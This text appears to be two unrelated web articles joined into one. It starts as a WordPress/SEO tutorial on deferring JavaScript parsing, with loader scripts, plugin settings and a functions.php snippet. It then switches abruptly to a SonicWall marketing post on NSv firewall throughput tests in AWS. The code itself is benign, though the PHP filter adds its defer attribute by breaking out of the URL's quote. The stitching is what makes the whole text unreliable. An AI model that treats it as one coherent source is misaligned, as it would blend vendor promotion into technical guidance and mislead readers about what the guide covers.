Critical vs Non-critical JavaScript: Explained
As the Google PageSpeed Insights (PSI) recommendation says, you should deliver critical JS inline and defer all non-critical JS.
What does this mean?
Let’s break that down by terminology.
Critical JavaScripts: JavaScripts that are necessary to load during optimized critical rendering.
Non-critical JavaScripts: Those JS that can wait to load until the first meaningful content (the first paint) of the webpage has loaded.
Inline Delivery: Inline delivery refers to loading a resource (in this case JS) within the HTML code instead of calling/importing that separately.
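For instance, a small critical script delivered inline sits directly in the HTML instead of being requested as a separate file (a minimal sketch; the one-liner itself is arbitrary):
<script>
document.documentElement.className = 'js-enabled'; // critical snippet shipped inline, so no extra request blocks rendering
</script>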
Curious? Why does JavaScript block the critical rendering path in the first place?
We’ll discuss that in the next section with other reasons why you should Defer JavaScript Parsing.
First of all, JavaScript(s) is one of the major culprits to make your website slow.
Wondering, why is that?
Because when the web browser comes across a script, it executes the script first before continuing to load the HTML that includes the content users are looking for.
For a browser, executing JavaScript is a heavy task (depending on the size of the script) and takes more time compared to rendering the meaningful content (the first paint) of the webpage.
Hence JavaScript affects the critical rendering path and slows down the pagespeed of your website.
Why not defer this heavier task of JS execution so that the critical rendering path remains uninterrupted, right?
Pagespeed is now a Ranking Factor
Site speed has already become a ranking signal.
About a decade ago Google announced in an official blog post on Google Webmaster Central Blog that site speed has become a ranking signal.
In another blog post published on the Official Webmaster Central Blog in 2018, they revealed that Google started using page speed as a ranking factor in mobile search ranking.
Since Google has declared pagespeed a factor in search result rankings for desktop and mobile, site speed optimization has become a significant aspect of technical SEO.
For the same reason, Google PageSpeed Insights Tool recommends deferred parsing of JavaScript as one of the solutions to remove render-blocking JavaScript in above-the-fold content.
User Experience decides Your Site's Success
How does JavaScript affect user experience (UX)?
We have already discussed that JavaScript(s) slow down the pagespeed by blocking the rendering of the first paint (the meaningful content). That leads to longer loading times and a longer wait for users to see the content; a bad user experience, right?
Speed matters a lot; the truth is users do not like slow-loading websites. In fact, studies show that users leave a slow-loading site early and move on.
On the contrary, you want your website audience to engage with your site and eventually turn into a customer, subscriber, or ad-viewer. In order to make that happen, you need to improve your pagespeed by deferring non-critical JavaScript(s).
Reasons to Defer Loading of JavaScript: Summing it up
As I mentioned above, whenever the parser (browser) encounters a script, it prioritizes downloading and executing the script over parsing the rest of the HTML.
But the fact is, most JavaScript(s) come into use only once the complete web page has loaded, for example in some animation, effect, or functionality.
Therefore, it is a good idea to load JavaScript(s) only after the content has loaded.
This way deferred loading of JavaScript does not affect the critical render path and consequently helps to speed up your website. And hence, a better user experience for your readers.
And by making your site load faster, you also improve your search ranking on desktop as well as mobile.
Do you know good web hosting is a must for better pagespeed? If you are already using good web hosting, awesome: let's skip to defer parsing of JavaScript. Not sure whether your hosting is as good as your website deserves? Don't worry. We recommend Cloudways and Kinsta Hosting for better sitespeed. Read our Kinsta Review.
Now, since you have an understanding of what is defer parsing of JavaScript and why you should defer loading of JavaScript(s).
It is a good time to figure out which JavaScript(s) on your website are the culprits and need to be deferred.
If you already know which JavaScript(s) on your website are blocking the critical rendering path, you may skip the following section and jump to the implementation part. Otherwise, keep on reading…
How to Find Render-blocking JavaScript(s)
JavaScript(s) which block the rendering of meaningful content are called ‘Render Blocking JavaScript(s)’ and need to be deferred.
You can find render-blocking JavaScript(s) by analyzing your website using site speed testing tools.
There are several pagespeed testing tools available to analyze a website for site speed and loading time. I am sharing with you the most reliable and trusted tools for pagespeed testing.
Test your site using these tools and note the results of these tools so that you can compare the results before and after implementing defer parsing of JavaScript(s).
1. PageSpeed Insights by Google
Google PageSpeed Insights (PSI) is an exclusive pagespeed testing tool by Google. Test your website using Google PSI Tool to find out render-blocking JavaScript(s). PageSpeed Insights Tool results give information about warnings and their solutions/fixes.
2. GTmetrix
This one (GTmetrix) is another good free tool to test site speed. You can test your site with GTmetrix to know which JavaScripts need to be deferred.
3. Pingdom Tools
Solarwinds’ Pingdom Tools are also very popular when it comes to site speed testing tools. You can test your site using Pingdom Tools to check the number of JS requests on your site and how much they contribute to the total number of requests.
Now you know which JavaScript(s) are making your site slow and need to be deferred. So, let’s see how to fix this issue by deferring non-critical JavaScript(JS).
Test Results: Before Defer Parsing of JavaScript
I have tested a website before implementing defer parsing of JavaScript. Consider these results a baseline and compare them with the results after deferred loading of JavaScripts.
How to Defer Parsing of JavaScript [Step by step]
You need to use the following code to defer parsing of JavaScript. Insert this code into the HTML file just before the </body> tag. Read the instructions given below to use this script.
<script type="text/javascript">
function parseJSAtOnload() {
var element = document.createElement("script");
element.src = "script_to_be_deferred.js";
document.body.appendChild(element);
}
if (window.addEventListener)
window.addEventListener("load", parseJSAtOnload, false);
else if (window.attachEvent)
window.attachEvent("onload", parseJSAtOnload);
else window.onload = parseJSAtOnload;
</script>
Instructions for Defer Parsing JavaScript using the script
Don’t forget to take a complete backup before making any changes in the code. If something went wrong, you can use that backup to go back.
Copy the code and paste it into the HTML file just before the </body> tag (near the bottom of the HTML file).
Replace script_to_be_deferred.js with the link of the JavaScript which is to be deferred. You can copy the link of JavaScript(s) (which Google PageSpeed tool suggests to defer) from Google PageSpeed Insights tool results for your website.
Save changes. And you are done.
Finally, test your website again to see the effect.
Code to Defer Multiple JavaScripts in One-go
If you want to defer multiple scripts in one go, you can use the same script with a little modification. In the following code, replace defer1.js, defer2.js, and defer3.js, etc. with the links of the scripts that you want to defer.
<script type="text/javascript">
function parseJSAtOnload() {
var links = ["defer1.js", "defer2.js", "defer3.js"],
headElement = document.getElementsByTagName("head")[0],
linkElement, i;
for (i = 0; i < links.length; i++) {
linkElement = document.createElement("script");
linkElement.src = links[i];
headElement.appendChild(linkElement);
}
}
if (window.addEventListener)
window.addEventListener("load", parseJSAtOnload, false);
else if (window.attachEvent)
window.attachEvent("onload", parseJSAtOnload);
else window.onload = parseJSAtOnload;
</script>
How to Defer Parsing of JavaScript in WordPress
You can defer parsing of JavaScript in WordPress by following methods:
Using WordPress Plugins (with a plugin) – suitable for all plugin lovers.
Adding a Code Snippet to functions.php file – suitable for those who are used to playing with code and editing files in WordPress. – without plugin method #1
Using the Script mentioned above – suitable for geeks who don’t want to use a plugin. – without plugin method #2
1. Defer Parsing of JavaScript using WordPress Plugin
There are several WordPress plugins available to defer parsing of JavaScript in WordPress, I am listing the best plugins that stand out in the crowd because of their performance and reliability.
Obviously, the process of installing and activating any of the following plugins remains the same.
If you’re not sure about the process of installing a WordPress plugin, you can refer this beginner’s guide to learn different methods of installing a plugin in WordPress.
#1.1 Async JavaScript Plugin
If you want a standalone plugin to defer parsing of JavaScript, Async JavaScript should be your pick.
This tiny plugin offers all necessary settings to tweak deferred loading of JS in WordPress.
HOW TO USE ASYNC JAVASCRIPT PLUGIN: SETTINGS & USAGE GUIDE
Steps to defer parsing of javascript in WordPress using a plugin:
Navigate to WordPress Dashboard > Plugins > Add New.
Search Async JavaScript Plugin in the plugin repository.
#1.2 Defer Parsing of JavaScript in W3 Total Cache Plugin
Steps to defer parsing of javascript in W3 Total Cache plugin:
Go over WP Dashboard > Performance (W3 Total Cache Settings) > Minify.
Scroll down to JS minify settings. You will see settings like shown in the image below.
Check/select options as shown in the image below. Click Save all settings and you are done.
Test your site using pagespeed test to see the results.
#1.3 Defer Parsing of JavaScript in Autoptimize Plugin
Steps to defer parsing of javascript in Autoptimize plugin:
Go to Dashboard > Settings > Autoptimize > JS, CSS & HTML.
Under JavaScript Options enable Optimize JavaScript Code and,
Then enable Do not aggregate but defer option and save changes.
Now Empty Cache and test your site using speed test tool to see the result.
#1.4 Defer Loading of JavaScript in LiteSpeed Cache Plugin
LiteSpeed Cache is an amazing optimization plugin for LiteSpeed server hosting. But the general features of this plugin can be utilized on any server like LiteSpeed, Apache, NGINX, etc.
#1.8 WP Fastest Cache to Defer Parsing of JavaScript
You can eliminate render-blocking JavaScript resources using WP Fastest Cache plugin. But this feature is available with the premium version only.
2. Defer JavaScript Parsing in WordPress via functions.php file
Yes, you can defer parsing of JavaScript in WordPress by adding a code snippet to the functions.php file.
This is one of the methods that you can use to Defer Parsing of JavaScript in WordPress without using a plugin.
As I have mentioned above this method is suitable for people who are comfortable with code editing in WordPress.
You might be thinking, but why?
First of all, functions.php is an important theme file. That means you might end up breaking your site if anything goes wrong while editing the functions.php file.
Also, there are different versions of the code snippet on the web to fix defer parsing of JavaScript in WordPress via functions file. Unfortunately, not all the code snippets work fine.
So you should be careful while using a code snippet to defer loading of JavaScript.
How to Edit functions.php File Safely
I always recommend using a child theme in WordPress in order to avoid code editing mess.
Because while editing the code, even if you miss a single comma (,) semicolon (;) or any other symbol/syntax, your website will break completely or partially. And you have to make extra efforts to recover the site.
For any reason, if you don’t want to implement a child theme now, you can use this plugin to add code to functions.php file of your theme without editing the original file.
Step by step process to Defer Parsing JavaScript in WordPress via functions.php
Take a complete backup before making any changes to the code.
I assume that you're using a child theme. If you're not, first create and activate a child theme to avoid any trouble caused by theme file editing.
Go to your WordPress Dashboard > Appearance > Theme Editor
Select/open functions.php file (of child theme) from theme files.
Paste the code snippet given below at the end of functions.php file.
You can specify JS files to exclude from defer in the array (‘jquery.js’).
Finally, click Update File to save changes. That’s all.
The code snippet is to be pasted in functions.php file.
// Defer Parsing of JavaScript in WordPress via functions.php file
// Learn more at https://technumero.com/defer-parsing-of-javascript/
function defer_parsing_js($url) {
//Add the files to exclude from defer. Add jquery.js by default
$exclude_files = array('jquery.js');
//Bypass JS defer for logged in users
if (!is_user_logged_in()) {
if (false === strpos($url, '.js')) {
return $url;
}
foreach ($exclude_files as $file) {
if (strpos($url, $file)) {
return $url;
}
}
} else {
return $url;
}
return "$url' defer='defer"; // closes the src attribute's quote and appends defer='defer' to the script tag
}
add_filter('clean_url', 'defer_parsing_js', 11, 1);
The above code snippet uses the defer attribute to defer parsing of JavaScripts. You can replace the defer attribute with the async attribute to parse JavaScript asynchronously. You can read more about the async attribute and other methods to fix render-blocking JavaScript.
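Assuming the snippet above, that change is a single line:
return "$url' async='async"; // closes the src attribute's quote and appends async='async' instead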
3. Defer Parsing of JavaScript without WordPress Plugin – Script Method
The script method explained above can be used in WordPress to defer loading of JavaScript. In WordPress, the above-mentioned code can be placed in the HTML just before the </body> tag using the hook content option.
Most of the popular WordPress themes come with a hook content provision. If you are not using the hook content option or it is not available in your theme, then you can either use a WordPress plugin to add the script to the WordPress footer before the </body> tag, or place the script in the footer file just before the </body> tag manually.
Steps to defer load javascript in WordPress without using a plugin:
Copy the code and paste it before the </body> tag (using a plugin or a built-in theme hook).
Now replace script_to_be_deferred.js with the JavaScript to be deferred.
Save changes and you’re done.
Clear the cache, if there is any.
Test your website again to see the result.
Test Results: After Defer Parsing of JavaScript
The following are the test results after defer loading of JavaScript.
Wrapping it up
Other than defer parsing of JavaScript, you can also use async attribute or inline JavaScript to remove render-blocking JavaScript. I have covered async attribute or inline JavaScript in another blog post, read that article here. In that article, I have also mentioned a few useful WordPress plugins to defer parsing JavaScript.
Although WordPress plugins are available to defer parsing of JavaScript, the script method explained above is considered more appropriate by several experts and webmasters. But the people who use WordPress know that using a WordPress plugin is like bliss.
I hope this guide will help you to defer parsing of JavaScript. Let me know which technique you use to defer parsing of JavaScript. If you are facing any problem implementing the above methods or have a question, let me know via the comment section. I will be happy to answer.
Looking for the best way to extend your firewall protection to the cloud? Independent testing recently found that SonicWall NSv series is more than up to the challenge.
More than 90% of enterprises use the cloud in some way, with 69% of those considered hybrid cloud users (utilizing both private and public clouds). Along with widespread remote work adoption, this shift is driving the need for scaled-out, distributed infrastructure.
Within this new cloud landscape, security has become more complex as the number of perimeters and integrations grow, and cybercriminals increasingly focus on security gaps and vulnerabilities in cloud implementations. It’s often easier for threat actors to exploit these vulnerabilities than it is to breach hardened components of the cloud deployment.
A next-generation firewall deployed in the cloud can protect critical data stored in the cloud. But it’s important to make sure this firewall provides the same level of security and performance as an on-premises firewall.
Recently, Tolly Group used Keysight Technologies’ brand-new native cloud testing solution — CyPerf — to measure the performance of SonicWall NSv 470 virtual firewall in Amazon Web Services (AWS). AWS is the major public cloud vendor, with a projected 49% market share in enterprise cloud adoption for 2022. AWS recommends a shared responsibility model, meaning AWS is responsible for the security of the cloud, and the customer is responsible for security in the cloud.
What is SonicWall NSv virtual firewall?
SonicWall’s NSv Series virtual firewalls provide all the security advantages of a physical firewall, plus all the operational and economic benefits of the cloud — including system scalability and agility, speed of system provisioning, simple management and cost reduction. NSv delivers full-featured security tools including VPN, IPS, application control and URL filtering. These capabilities shield all critical components of the private/public cloud environments from resource misuse attacks, cross-virtual-machine attacks, side-channel attacks, and common network-based exploits and threats.
What is Keysight Technologies CyPerf?
Keysight CyPerf is the industry’s first cloud-native software solution that recreates every aspect of a realistic workload across a variety of physical and cloud environments. CyPerf deployed across a variety of heterogeneous cloud environments realistically models dynamic application traffic, user behavior and threat vectors at scale. It validates hybrid cloud networks, security devices and services for more confident rollouts.
Putting SonicWall NSv to the Test
Keysight Technologies and Tolly Group engineers tested a SonicWall NSv 470 virtual firewall running SonicOSX version 7. The AWS instance for the NSv 470 under test was AWS c5.2xlarge. The engineers deployed CyPerf agents on AWS c5n.2xlarge instances to be certain that the agents would have sufficient resources to stress the firewall under test. Each of the two agent instances was provisioned with 8 vCPUs, 21GB memory and 25GbE network interfaces.
Test methodology and results
The engineers used three different traffic profiles to collect results — unencrypted HTTP traffic, encrypted (HTTPS/TLS) traffic, and Tolly’s productivity traffic mix, which includes five applications: JIRA, Office 365, Skype, AWS S3 and Salesforce. Engineers used CyPerf application mix tests to create the Tolly productivity mix and generate stateful, simulated application traffic.
The tests were run against three different security profiles:
1) Firewall: Basic firewall functions with no policy set
2) IPS: Firewall with the intrusion prevention system feature enabled
3) Threat Prevention: Firewall with IPS, antivirus, anti-spyware and application control features enabled
The results observed in the AWS public cloud environment are similar to the results observed in a virtual environment.
Test | Unencrypted HTTP Traffic | Encrypted HTTPS/TLS Traffic
Firewall Throughput | 7.70 Gbps | 3.10 Gbps
IPS Throughput | 7.60 Gbps | 3.05 Gbps
Threat Prevention | 7.40 Gbps | 3.04 Gbps
Table 1: Test measurements for NSv 470 in AWS Cloud
Note: The table above highlights just a few of the test results. For complete results and test parameters, please download the report.
Conclusion
Most enterprises are moving their datacenters away from traditional on-premises deployments and into the cloud. It is imperative that security teams provide the same level of security for cloud server instances as they have been providing for on-premises physical servers. A next-generation firewall with advanced security services like IPS and application control is the first step to securing cloud instances against cyber threats.
In addition to security features, it is also important to choose a firewall that provides the right level of performance needed for a given cloud workload. SonicWall NSv series offers a variety of models with performance levels suited to any size of cloud deployment, with all the necessary security features enabled. To learn more about how SonicWall NSv Series excels in AWS environments, click here.